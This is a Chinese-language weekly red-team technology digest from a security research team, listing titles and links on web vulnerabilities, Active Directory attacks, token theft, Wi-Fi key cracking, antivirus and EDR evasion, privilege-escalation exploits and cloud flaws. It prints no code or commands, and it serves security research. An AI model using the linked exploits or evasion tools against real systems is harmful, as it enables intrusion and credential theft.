每周蓝军技术推送(2022.9.17-9.23)
2022-9-23 18:1:25 Author: M01N Team(查看原文) 阅读量:24 收藏

Web安全

fastjson 1.2.80 漏洞分析

https://y4er.com/posts/fastjson-1.2.80/

BCS2022-探索JNDI攻击

https://github.com/iSafeBlue/presentation-slides/blob/main/BCS2022-%E6%8E%A2%E7%B4%A2JNDI%E6%94%BB%E5%87%BB.pdf

利用Web3的隐藏攻击面:Netlify的Next.js库通用XSS

https://samcurry.net/universal-xss-on-netlifys-next-js-library/

内网渗透

BloodHound专注于Active Directory,但是缺少对真实场景的考虑

https://blog.syss.com/posts/bloodhound-blindspots/

从Office桌面应用程序中窃取访问令牌

https://mrd0x.com/stealing-tokens-from-office-applications/

从Live Network破解WPA/WPA2的预共享密钥

https://tbhaxor.com/cracking-wpa-psk-using-aircrack/

GetMail:利用NTLM Hash读取Exchange邮件

https://github.com/b0bac/GetMail

ldapnomnom:通过滥用LDAP Ping请求(cLDAP)从DC匿名暴力破解域用户名

https://github.com/lkarlslund/ldapnomnom

终端对抗

规避WinDefender ATP凭据盗窃:内核版本

https://b4rtik.github.io/posts/evading-windefender-atp-credential-theft-kernel-version/

利用GraalVM实现免杀加载器

https://xie.infoq.cn/article/ee227650630be0e362b161333

MasqueradingPEB:通过更改PEB结构中的某些字段伪装合法的Windows二进制文件

https://github.com/D1rkMtr/MasqueradingPEB

ExecRemoteAssembly:支持参数传递的远程执行程序集,并patch AMSI和ETW绕过检测

https://github.com/D1rkMtr/ExecRemoteAssembly

COM可扩展面Moniker,可解释displayname并返回客户端试图定位的真实对象

https://scorpiosoftware.net/2022/09/18/introduction-to-monikers/

https://github.com/zodiacon/MonikerFun

Codecepticon:可以对 C#、VBA/VB6(宏)和PowerShell代码进行混淆的.Net程序

https://github.com/Accenture/Codecepticon

MacOS安全机制以及攻击利用技术

https://www.securing.pl/en/presentation/0-day-up-your-sleeve-attacking-macos-environments/

DylibHijackTest:在MacOS上发现DYLD_INSERT_LIBRARIES劫持

https://github.com/slyd0g/DylibHijackTest

漏洞相关

从Leaking TheHole到Chrome染器RCE

https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078

CVE-2022-36804:Bitbucket Server命令注入漏洞分析

https://www.anquanke.com/post/id/280193

https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/

利用Process Explorer的驱动句柄复制实现内核代码执行

https://www.elastic.co/cn/security-labs/stopping-vulnerable-driver-attacks

CVE-2022-37706:Ubuntu 22.04特权提升EXP

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

CVE-2022-40286:利用Seagate服务创建SYSTEM Shell

https://www.x86matthew.com/view_post?id=windows_seagate_lpe

ANGRYORCHARD:利用NtUserHardErrorControl将线程提升到KernelMode实现Windows 7-11 内核任意读写

https://github.com/SecIdiot/ANGRYORCHARD

云安全

Azure Cloud Shell命令注入窃取用户的访问令牌

https://blog.lightspin.io/azure-cloud-shell-command-injection-stealing-users-access-tokens

AttachMe:允许未经授权访问客户云存储卷的OCI漏洞

https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access

CloudFox:云环境态势感知,辅助在云基础设施中找到可利用的攻击路径

https://github.com/BishopFox/cloudfox

Teamsniper:从Microsoft team中抓取敏感信息

https://github.com/xRET2pwn/Teamsniper

其他

MacOS 水坑攻击组合拳分析复现

https://tttang.com/archive/1745/

荷兰情报与安全局 (AIVD) 和军事情报与安全局 (MIVD)的自动化 OSINT 使用情况报告

https://english.ctivd.nl/documents/review-reports/2022/09/19/index

M01N Team公众号

聚焦高级攻防对抗热点技术

绿盟科技蓝军技术研究战队

官方攻防交流群

网络安全一手资讯

攻防技术答疑解惑

扫码加好友即可拉群

往期推荐

每周蓝军技术推送(2022.9.10-9.16)

每周蓝军技术推送(2022.9.3-9.9)

每周蓝军技术推送(2022.8.27-9.2)


文章来源: http://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247489743&idx=1&sn=398486d455f8a35870e9c9700ba73188&chksm=c187d8def6f051c8cd77ef63ee8edb4948ab7ecd6f119d0d6fb3429fc430cd1d5962ea2f195b#rd
如有侵权请联系:admin#unsafe.sh